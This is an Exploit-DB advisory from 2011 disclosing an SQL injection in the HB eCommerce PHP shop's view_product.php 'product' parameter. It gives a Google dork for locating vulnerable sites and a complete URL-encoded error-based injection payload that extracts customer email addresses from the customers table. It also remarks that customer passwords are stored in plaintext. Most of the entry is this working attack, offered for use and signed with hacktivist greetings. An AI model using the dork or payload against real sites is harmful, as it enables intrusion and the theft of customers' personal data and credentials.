HB eCommerce - SQL Injection

EDB-ID:

17327

CVE:

N/A


Author:

takeshix

Type:

webapps


Platform:

PHP

Date:

2011-05-27


-------------[ HB ECOMMERCE SQL Injection Vulnerability ]---------------
------------------------------------------------------------------------
------------------------------------------------------------------------
[+] Exploit Title: [ HB ECOMMERCE SQL Injection Vulnerability ]
[+] Google Dork: intext:'supplied by hb ecommerce'
[+] Date: 26.05.2011
[+] Author: takeshix
[+] Author Contact: takeshix@safe-mail.net
[+] Software Link: http://www.hbecommerce.co.uk/
[+] Tested on: Debian GNU/Linux Testing(Wheezy) x64
[+] System: PHP
------------------------------------------------------------------------
------------------------------------------------------------------------
vulnerable url:

/templates1/view_product.php?product=

Example:

http://localhost/templates1/view_product.php?product=[SQL INJECTION]

Get an Mail from the Customers Table:

http://localhost/templates1/view_product.php?product=94746%20AND%20%28SEL=
ECT%20716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C122%2C99%=
2C109%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28email%20AS%20CHAR%29%2=
CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20%60web34-hbecommerc%60.customers%2=
0LIMIT%205%2C1%29%2CCHAR%2858%2C109%2C103%2C100%2C58%29%2CFLOOR%28RAND%280%=
29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%2=
9a%29%20

note: customer passwords dumped in plaintext!

------------------------------------------------------------------------
------------------------------------------------------------------------
Greez to: esc0bar | Someone | takedown
------------------------------------------------------------------------
------------------------------------------------------------------------
--------------------------[ hacktivistas ]------------------------------